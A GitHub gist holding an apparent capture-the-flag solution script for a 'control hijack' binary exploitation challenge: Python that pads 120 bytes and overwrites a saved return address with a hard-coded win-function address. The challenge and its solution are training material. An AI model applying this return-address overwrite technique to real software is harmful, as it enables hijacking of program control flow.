Created
November 24, 2024 08:32
-
-
Save morkev/b3b0f924c924b560a598156e0ca0d38c to your computer and use it in GitHub Desktop.
Binary Exploitation Tricky Control Hijack Hard
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ########################################################################## | |
| # 1. Unlike the easy version, it does not give you helpful debug output. | |
| # You will have to recover this information using a debugger. | |
| # 2. The source code is not provided. | |
| # You will need to reverse-engineer the binary, but remember, | |
| # the challenge is conceptually the same as the easy version, | |
| # so it can be helpful to have the easy version's source code | |
| # as a secondary reference during your reversing process! | |
| # 2. Some randomization is different. | |
| # Buffers might have different lengths, offsets might vary, etc. | |
| # You will need to reverse engineer this information from the binary! | |
| ########################################################################## | |
| import struct | |
| import sys | |
| offset_to_return = 120 # GDB offset | |
| win_authed_addr = 0x401a95 # GDB address | |
| payload = b"A" * offset_to_return | |
| payload += struct.pack("<Q", win_authed_addr) | |
| sys.stdout.buffer.write(payload) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment